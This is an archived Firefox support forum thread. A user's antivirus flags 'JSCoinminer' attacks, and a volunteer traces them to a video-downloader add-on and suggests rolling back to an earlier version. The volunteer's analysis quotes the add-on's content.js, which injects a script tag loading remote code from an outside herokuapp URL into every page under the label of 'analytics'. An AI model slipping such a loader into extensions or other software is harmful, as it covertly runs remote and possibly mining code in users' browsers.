X
Thinta lapha ukuze uye kuveshini yamakhalekhukhwini kusayithi.

Isithangami Sabeseki

Lolu chungechunge lwabekwa kunqolobane. Uyacelwa ubuze umbuzo omusha uma udinga usizo.

Web Attacker: JSCoinminer Download 8 (Symantec Description Name)

DG
Kuphostiwe

As of today, 3/24/18, I keep getting web attacks with FIrefox on all websites visited, attacks which are being blocked by my firewall, Symantec's "Norton Security":

Intrusion type: "JSCoinminer Download 8", as per Symantec's description Attacker URL: thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics

Happens through: "C:\ Program Files (x86)\Mozilla Firefox\firefox.exe", although I use a 64-bit version of Firefox on Windows 7 (SP1), 64-bit.

Since it has "Mozilla" in the URL, does Mozilla know anything about this?

Happens on ALL websites, including, but not limited to, www.nytimes.com , www.washingtonpost.com. , support/mozilla.org/

Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for a least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2

As of today, 3/24/18, I keep getting web attacks with FIrefox on all websites visited, attacks which are being blocked by my firewall, Symantec's "Norton Security": Intrusion type: "JSCoinminer Download 8", as per Symantec's description Attacker URL: thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics Happens through: "C:\ Program Files (x86)\Mozilla Firefox\firefox.exe", although I use a 64-bit version of Firefox on Windows 7 (SP1), 64-bit. Since it has "Mozilla" in the URL, does Mozilla know anything about this? Happens on ALL websites, including, but not limited to, www.nytimes.com , www.washingtonpost.com. , support/mozilla.org/ Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for a least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2

Okulungisiwe ngu DG

Isisombululo esikhethiwe

I did as you suggested, and installed and enabled the previous 8.5 version, with updates disabled. As a result, I'm NOT getting the attack messages now from my Symantec firewall like I did when the newer version of the add-on was installed.

I also posted a message about the problem on the add-on's review page, and sent a message to Mozilla through the feedback option there. Another person had also posted, in German, a warning on the review page about the attacking URL.

Thank you for your quick and helpful response in all this. It is much appreciated.

Funda le mpendulo ngokuhambisana nalesi sihloko 1

Eminye Imininingwane Yohlelo

Fakela amapulagi

  • Shockwave Flash 27.0 r0

Isisebenziso

  • Firefox 59.0.1
  • Umsebenzisi oyi-ejenti: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
  • I-URL Yokweseka: https://support.mozilla.org/1/firefox/59.0.1/WINNT/en-US/

Izandiso

  • AdBlocker Ultimate 2.31 (adblockultimate@adblockultimate.net)
  • Ghostery – Privacy Ad Blocker 8.1.0 (firefox@ghostery.com)
  • HTTPS Everywhere 2018.3.13 (https-everywhere@eff.org)
  • uBlock Origin 1.15.18 (uBlock0@raymondhill.net)
  • Video DownloadHelper 7.2.2 ({b9db16a4-6edc-47ec-a1f4-b86292ed211d})
  • YouTube Best Video Downloader 2 8.5.1 ({170503FA-3349-4F17-BC86-001888A5C8E2})

I-Javascript

  • incrementalGCEnabled: True

Imidwebo

  • adapterDescription: NVIDIA Quadro K420
  • adapterDescription2:
  • adapterDeviceID: 0x0ff3
  • adapterDeviceID2:
  • adapterDrivers: nvd3dumx,nvwgf2umx,nvwgf2umx nvd3dum,nvwgf2um,nvwgf2um
  • adapterDrivers2:
  • adapterRAM: 2048
  • adapterRAM2:
  • adapterSubsysID: 116210de
  • adapterSubsysID2:
  • adapterVendorID: 0x10de
  • adapterVendorID2:
  • crashGuards: []
  • direct2DEnabled: True
  • directWriteEnabled: True
  • directWriteVersion: 6.2.9200.22164
  • driverDate: 7-25-2017
  • driverDate2:
  • driverVersion: 23.21.13.8508
  • driverVersion2:
  • featureLog: {u'fallbacks': [{u'message': u'Unsupported by driver', u'name': u'NO_CONSTANT_BUFFER_OFFSETTING'}], u'features': [{u'status': u'available', u'description': u'Compositing', u'name': u'HW_COMPOSITING', u'log': [{u'status': u'available', u'type': u'default'}]}, {u'status': u'available', u'description': u'Direct3D11 Compositing', u'name': u'D3D11_COMPOSITING', u'log': [{u'status': u'available', u'type': u'default'}]}, {u'status': u'available', u'description': u'Direct2D', u'name': u'DIRECT2D', u'log': [{u'status': u'available', u'type': u'default'}]}, {u'status': u'available', u'description': u'Direct3D11 hardware ANGLE', u'name': u'D3D11_HW_ANGLE', u'log': [{u'status': u'available', u'type': u'default'}]}, {u'status': u'available', u'description': u'GPU Process', u'name': u'GPU_PROCESS', u'log': [{u'status': u'available', u'type': u'default'}]}, {u'status': u'unavailable', u'description': u'WebRender', u'name': u'WEBRENDER', u'log': [{u'status': u'opt-in', u'message': u'WebRender is an opt-in feature', u'type': u'default'}, {u'status': u'unavailable', u'message': u"Build doesn't include WebRender", u'type': u'runtime'}]}, {u'status': u'available', u'description': u'Off Main Thread Painting', u'name': u'OMTP', u'log': [{u'status': u'available', u'type': u'default'}]}, {u'status': u'available', u'description': u'Advanced Layers', u'name': u'ADVANCED_LAYERS', u'log': [{u'status': u'available', u'type': u'default'}, {u'status': u'available', u'message': u'Enabled for Windows 7 via user-preference', u'type': u'user'}]}]}
  • info: {u'AzureContentBackend (UI Process)': u'skia', u'AzureCanvasBackend (UI Process)': u'skia', u'ApzWheelInput': 1, u'ApzDragInput': 1, u'ApzKeyboardInput': 1, u'AzureFallbackCanvasBackend (UI Process)': u'cairo', u'ApzAutoscrollInput': 1, u'AzureCanvasAccelerated': 0, u'AzureCanvasBackend': u'Direct2D 1.1', u'AzureContentBackend': u'Direct2D 1.1'}
  • isGPU2Active: False
  • numAcceleratedWindows: 1
  • numTotalWindows: 1
  • offMainThreadPaintEnabled: True
  • webgl1DriverExtensions: GL_ANGLE_client_arrays GL_ANGLE_depth_texture GL_ANGLE_framebuffer_blit GL_ANGLE_framebuffer_multisample GL_ANGLE_instanced_arrays GL_ANGLE_lossy_etc_decode GL_ANGLE_pack_reverse_row_order GL_ANGLE_program_cache_control GL_ANGLE_request_extension GL_ANGLE_robust_client_memory GL_ANGLE_robust_resource_initialization GL_ANGLE_texture_compression_dxt3 GL_ANGLE_texture_compression_dxt5 GL_ANGLE_texture_usage GL_ANGLE_translated_shader_source GL_CHROMIUM_bind_generates_resource GL_CHROMIUM_bind_uniform_location GL_CHROMIUM_color_buffer_float_rgb GL_CHROMIUM_color_buffer_float_rgba GL_CHROMIUM_copy_compressed_texture GL_CHROMIUM_copy_texture GL_CHROMIUM_sync_query GL_EXT_blend_minmax GL_EXT_color_buffer_half_float GL_EXT_debug_marker GL_EXT_discard_framebuffer GL_EXT_disjoint_timer_query GL_EXT_draw_buffers GL_EXT_frag_depth GL_EXT_map_buffer_range GL_EXT_occlusion_query_boolean GL_EXT_read_format_bgra GL_EXT_robustness GL_EXT_sRGB GL_EXT_shader_texture_lod GL_EXT_texture_compression_dxt1 GL_EXT_texture_compression_s3tc_srgb GL_EXT_texture_filter_anisotropic GL_EXT_texture_format_BGRA8888 GL_EXT_texture_rg GL_EXT_texture_storage GL_EXT_unpack_subimage GL_KHR_debug GL_NV_EGL_stream_consumer_external GL_NV_fence GL_NV_pack_subimage GL_NV_pixel_buffer_object GL_OES_EGL_image GL_OES_EGL_image_external GL_OES_compressed_ETC1_RGB8_texture GL_OES_depth32 GL_OES_element_index_uint GL_OES_get_program_binary GL_OES_mapbuffer GL_OES_packed_depth_stencil GL_OES_rgb8_rgba8 GL_OES_standard_derivatives GL_OES_surfaceless_context GL_OES_texture_float GL_OES_texture_float_linear GL_OES_texture_half_float GL_OES_texture_half_float_linear GL_OES_texture_npot GL_OES_vertex_array_object
  • webgl1Extensions: ANGLE_instanced_arrays EXT_blend_minmax EXT_color_buffer_half_float EXT_frag_depth EXT_sRGB EXT_shader_texture_lod EXT_texture_filter_anisotropic EXT_disjoint_timer_query OES_element_index_uint OES_standard_derivatives OES_texture_float OES_texture_float_linear OES_texture_half_float OES_texture_half_float_linear OES_vertex_array_object WEBGL_color_buffer_float WEBGL_compressed_texture_s3tc WEBGL_compressed_texture_s3tc_srgb WEBGL_debug_renderer_info WEBGL_debug_shaders WEBGL_depth_texture WEBGL_draw_buffers WEBGL_lose_context
  • webgl1Renderer: Google Inc. -- ANGLE (NVIDIA Quadro K420 Direct3D11 vs_5_0 ps_5_0)
  • webgl1Version: OpenGL ES 2.0 (ANGLE 2.1.0.db3422764a9b)
  • webgl1WSIInfo: EGL_VENDOR: Google Inc. (adapter LUID: 0000000000008d93) EGL_VERSION: 1.4 (ANGLE 2.1.0.db3422764a9b) EGL_EXTENSIONS: EGL_EXT_create_context_robustness EGL_ANGLE_d3d_share_handle_client_buffer EGL_ANGLE_d3d_texture_client_buffer EGL_ANGLE_surface_d3d_texture_2d_share_handle EGL_ANGLE_query_surface_pointer EGL_ANGLE_window_fixed_size EGL_ANGLE_keyed_mutex EGL_ANGLE_surface_orientation EGL_NV_post_sub_buffer EGL_KHR_create_context EGL_EXT_device_query EGL_KHR_image EGL_KHR_image_base EGL_KHR_gl_texture_2D_image EGL_KHR_gl_texture_cubemap_image EGL_KHR_gl_renderbuffer_image EGL_KHR_get_all_proc_addresses EGL_KHR_stream EGL_KHR_stream_consumer_gltexture EGL_NV_stream_consumer_gltexture_yuv EGL_ANGLE_flexible_surface_compatibility EGL_ANGLE_create_context_webgl_compatibility EGL_CHROMIUM_create_context_bind_generates_resource EGL_EXT_pixel_format_float EGL_KHR_surfaceless_context EGL_ANGLE_display_texture_share_group EGL_ANGLE_create_context_client_arrays EGL_ANGLE_program_cache_control EGL_EXTENSIONS(nullptr): EGL_EXT_client_extensions EGL_EXT_platform_base EGL_EXT_platform_device EGL_ANGLE_platform_angle EGL_ANGLE_platform_angle_d3d EGL_ANGLE_device_creation EGL_ANGLE_device_creation_d3d11 EGL_ANGLE_experimental_present_path EGL_KHR_client_get_all_proc_addresses EGL_ANGLE_display_robust_resource_initialization
  • webgl2DriverExtensions: GL_ANGLE_client_arrays GL_ANGLE_depth_texture GL_ANGLE_framebuffer_blit GL_ANGLE_framebuffer_multisample GL_ANGLE_instanced_arrays GL_ANGLE_lossy_etc_decode GL_ANGLE_multiview GL_ANGLE_pack_reverse_row_order GL_ANGLE_program_cache_control GL_ANGLE_request_extension GL_ANGLE_robust_client_memory GL_ANGLE_robust_resource_initialization GL_ANGLE_texture_compression_dxt3 GL_ANGLE_texture_compression_dxt5 GL_ANGLE_texture_usage GL_ANGLE_translated_shader_source GL_CHROMIUM_bind_generates_resource GL_CHROMIUM_bind_uniform_location GL_CHROMIUM_color_buffer_float_rgb GL_CHROMIUM_color_buffer_float_rgba GL_CHROMIUM_copy_compressed_texture GL_CHROMIUM_copy_texture GL_CHROMIUM_sync_query GL_EXT_blend_minmax GL_EXT_color_buffer_float GL_EXT_color_buffer_half_float GL_EXT_debug_marker GL_EXT_discard_framebuffer GL_EXT_disjoint_timer_query GL_EXT_draw_buffers GL_EXT_frag_depth GL_EXT_map_buffer_range GL_EXT_occlusion_query_boolean GL_EXT_read_format_bgra GL_EXT_robustness GL_EXT_sRGB GL_EXT_shader_texture_lod GL_EXT_texture_compression_dxt1 GL_EXT_texture_compression_s3tc_srgb GL_EXT_texture_filter_anisotropic GL_EXT_texture_format_BGRA8888 GL_EXT_texture_norm16 GL_EXT_texture_rg GL_EXT_texture_storage GL_EXT_unpack_subimage GL_KHR_debug GL_NV_EGL_stream_consumer_external GL_NV_fence GL_NV_pack_subimage GL_NV_pixel_buffer_object GL_OES_EGL_image GL_OES_EGL_image_external GL_OES_EGL_image_external_essl3 GL_OES_compressed_ETC1_RGB8_texture GL_OES_depth32 GL_OES_element_index_uint GL_OES_get_program_binary GL_OES_mapbuffer GL_OES_packed_depth_stencil GL_OES_rgb8_rgba8 GL_OES_standard_derivatives GL_OES_surfaceless_context GL_OES_texture_float GL_OES_texture_float_linear GL_OES_texture_half_float GL_OES_texture_half_float_linear GL_OES_texture_npot GL_OES_vertex_array_object
  • webgl2Extensions: EXT_color_buffer_float EXT_texture_filter_anisotropic EXT_disjoint_timer_query OES_texture_float_linear WEBGL_compressed_texture_s3tc WEBGL_compressed_texture_s3tc_srgb WEBGL_debug_renderer_info WEBGL_debug_shaders WEBGL_lose_context
  • webgl2Renderer: Google Inc. -- ANGLE (NVIDIA Quadro K420 Direct3D11 vs_5_0 ps_5_0)
  • webgl2Version: OpenGL ES 3.0 (ANGLE 2.1.0.db3422764a9b)
  • webgl2WSIInfo: EGL_VENDOR: Google Inc. (adapter LUID: 0000000000008d93) EGL_VERSION: 1.4 (ANGLE 2.1.0.db3422764a9b) EGL_EXTENSIONS: EGL_EXT_create_context_robustness EGL_ANGLE_d3d_share_handle_client_buffer EGL_ANGLE_d3d_texture_client_buffer EGL_ANGLE_surface_d3d_texture_2d_share_handle EGL_ANGLE_query_surface_pointer EGL_ANGLE_window_fixed_size EGL_ANGLE_keyed_mutex EGL_ANGLE_surface_orientation EGL_NV_post_sub_buffer EGL_KHR_create_context EGL_EXT_device_query EGL_KHR_image EGL_KHR_image_base EGL_KHR_gl_texture_2D_image EGL_KHR_gl_texture_cubemap_image EGL_KHR_gl_renderbuffer_image EGL_KHR_get_all_proc_addresses EGL_KHR_stream EGL_KHR_stream_consumer_gltexture EGL_NV_stream_consumer_gltexture_yuv EGL_ANGLE_flexible_surface_compatibility EGL_ANGLE_create_context_webgl_compatibility EGL_CHROMIUM_create_context_bind_generates_resource EGL_EXT_pixel_format_float EGL_KHR_surfaceless_context EGL_ANGLE_display_texture_share_group EGL_ANGLE_create_context_client_arrays EGL_ANGLE_program_cache_control EGL_EXTENSIONS(nullptr): EGL_EXT_client_extensions EGL_EXT_platform_base EGL_EXT_platform_device EGL_ANGLE_platform_angle EGL_ANGLE_platform_angle_d3d EGL_ANGLE_device_creation EGL_ANGLE_device_creation_d3d11 EGL_ANGLE_experimental_present_path EGL_KHR_client_get_all_proc_addresses EGL_ANGLE_display_robust_resource_initialization
  • windowLayerManagerRemote: True
  • windowLayerManagerType: Direct3D 11
  • windowUsingAdvancedLayers: True

Okuthandwayo Okulungisiwe

Misc

  • Umsebenzisi JS: Yebo
  • Ukufinyeleleka: Cha
jscher2000
  • Top 10 Contributor
8961 izisombululo 73431 izimpendulo
Kuphostiwe

degnmozilla said

Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for a least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2

Test by disabling half of them and seeing whether anything changes. If problems continue, try the other half.


Could you check for alien script files in your Firefox program folder? In particular, in these locations (varies for 32-bit / 64-bit):

  • C:\Program Files\Mozilla Firefox\defaults\pref
  • C:\Program Files (x86)\Mozilla Firefox\defaults\pref

Caution: Do not double-click script files! The default action for a script file it to execute as a Windows system script. (Typically this would just not work, but why risk it.)

Make sure Windows is showing hidden files: https://support.microsoft.com/en-us/help/14201/windows-show-hidden-files

A file named channel-prefs.js is normal. Any other file in this folder is suspicious. Remove any such files to a neutral location for further analysis at your leisure.

Changes here would take effect at your next startup.

''degnmozilla [[#question-1210834|said]]'' <blockquote>Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for a least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2</blockquote> Test by disabling half of them and seeing whether anything changes. If problems continue, try the other half. ---- Could you check for alien script files in your Firefox program folder? In particular, in these locations (varies for 32-bit / 64-bit): * C:\Program Files\Mozilla Firefox\defaults\pref * C:\Program Files (x86)\Mozilla Firefox\defaults\pref Caution: ''Do not double-click script files!'' The default action for a script file it to execute as a Windows system script. (Typically this would just not work, but why risk it.) Make sure Windows is showing hidden files: https://support.microsoft.com/en-us/help/14201/windows-show-hidden-files A file named '''channel-prefs.js''' is normal. '''Any other file''' in this folder is suspicious. Remove any such files to a neutral location for further analysis at your leisure. Changes here would take effect at your next startup.

Impendulo Ewusizo

By disabling "YouTube Best Video Downloader 2" the attacks stopped. Disabling the other add-ons listed above made no difference.

Right now I'm leaving "YouTube Best Video Downloader 2" disabled, and will continued to monitor whether that fixes the problem for good.

If this particular add-on is compromised, I would hope Mozilla would contact the developer about the problem. Also, if it is ever fixed, I would appreciate hearing that it is safe to use, again.

Thank you for your response above.

By disabling "YouTube Best Video Downloader 2" the attacks stopped. Disabling the other add-ons listed above made no difference. Right now I'm leaving "YouTube Best Video Downloader 2" disabled, and will continued to monitor whether that fixes the problem for good. If this particular add-on is compromised, I would hope Mozilla would contact the developer about the problem. Also, if it is ever fixed, I would appreciate hearing that it is safe to use, again. Thank you for your response above.

Umnikazi wombuzo

As to your other suggest above, only "channel-prefs.js" is located in the directory you indicated, with "hidden files" showing.

As to your other suggest above, only "channel-prefs.js" is located in the directory you indicated, with "hidden files" showing.
jscher2000
  • Top 10 Contributor
8961 izisombululo 73431 izimpendulo
Kuphostiwe

I don't know why the extension uses that "attacker URL". When I submit that script to VirusTotal, there are 3 detections out of 58, so it's not clear whether it's really dangerous or just looks suspiciously similar to something else:

https://www.virustotal.com/#/file/af5653f205bec5784c015cf0ea5bc3dd86824496ff41c9a626a34bb11bcfe74f/detection

It seems intended to do some kind of global logging of certain activity in pages:

/content_script/content.js:

//code to log event
(function(){
	var logContentEvent = document.createElement('script'); 
	logContentEvent.src = 'https://thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics'; 
	document.body.appendChild(logContentEvent);
})(); 

This content.js script seems to be new in the latest release (March 17th). The only explanation of the change is:

" improved analytics to serve better"

To serve whom better?!

If you want to use this extension, you could roll back to the March 15th release. Here's how:

(1) Disable auto-updating for this extension

On the Add-ons page, click the "More" link for the extension and scroll down to the row with the Automatic Updates line (Default On Off Check for Updates) and click Off.

This should be saved without any need to click a Save button.

(2) Go to the extension's "Versions" page and install 8.5, the immediately previous version:

https://addons.mozilla.org/firefox/addon/youtube-download-mp3-mp4-1080p/versions/

As shown in the attached screenshot, the suspicious file does not exist in the earlier version.

Or if you no longer trust this add-on developer, you could just leave it disabled or remove it.

I don't know why the extension uses that "attacker URL". When I submit that script to VirusTotal, there are 3 detections out of 58, so it's not clear whether it's really dangerous or just looks suspiciously similar to something else: https://www.virustotal.com/#/file/af5653f205bec5784c015cf0ea5bc3dd86824496ff41c9a626a34bb11bcfe74f/detection It seems intended to do some kind of global logging of certain activity in pages: /content_script/content.js: <pre>//code to log event (function(){ var logContentEvent = document.createElement('script'); logContentEvent.src = 'https://thrillingos.herokuapp''.''com/mozilla/best-ytb-down/content/analytics'; document.body.appendChild(logContentEvent); })(); </pre> This content.js script seems to be new in the latest release (March 17th). The only explanation of the change is: " improved analytics to serve better" To serve ''whom'' better?! If you want to use this extension, you could roll back to the March 15th release. Here's how: (1) Disable auto-updating for this extension On the Add-ons page, click the "More" link for the extension and scroll down to the row with the Automatic Updates line (Default On Off Check for Updates) and click Off. This should be saved without any need to click a Save button. (2) Go to the extension's "Versions" page and install 8.5, the immediately previous version: https://addons.mozilla.org/firefox/addon/youtube-download-mp3-mp4-1080p/versions/ As shown in the attached screenshot, the suspicious file does not exist in the earlier version. Or if you no longer trust this add-on developer, you could just leave it disabled or remove it.

Isisombululo Esikhethiwe

I did as you suggested, and installed and enabled the previous 8.5 version, with updates disabled. As a result, I'm NOT getting the attack messages now from my Symantec firewall like I did when the newer version of the add-on was installed.

I also posted a message about the problem on the add-on's review page, and sent a message to Mozilla through the feedback option there. Another person had also posted, in German, a warning on the review page about the attacking URL.

Thank you for your quick and helpful response in all this. It is much appreciated.

I did as you suggested, and installed and enabled the previous 8.5 version, with updates disabled. As a result, I'm NOT getting the attack messages now from my Symantec firewall like I did when the newer version of the add-on was installed. I also posted a message about the problem on the add-on's review page, and sent a message to Mozilla through the feedback option there. Another person had also posted, in German, a warning on the review page about the attacking URL. Thank you for your quick and helpful response in all this. It is much appreciated.
Shadow110 1072 izisombululo 14836 izimpendulo
Kuphostiwe

Impendulo Ewusizo

Hi, glad got things figured out. Please Mark the Answer with the Solution as Solved.

Hi, glad got things figured out. Please Mark the Answer with the Solution as Solved.